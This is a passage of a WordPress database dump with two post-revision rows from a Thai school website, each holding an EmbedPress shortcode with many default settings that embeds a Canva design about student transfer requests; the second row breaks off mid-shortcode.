(1630,1,'2025-07-03 09:43:31','2025-07-03 02:43:31','[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' width=\'1200\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:43:31','2025-07-03 02:43:31','',1623,'http://pakhaeng.ssk.in.th/?p=1630',0,'revision','',0),
(1631,1,'2025-07-03 09:43:31','2025-07-03 02:43:31','[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' 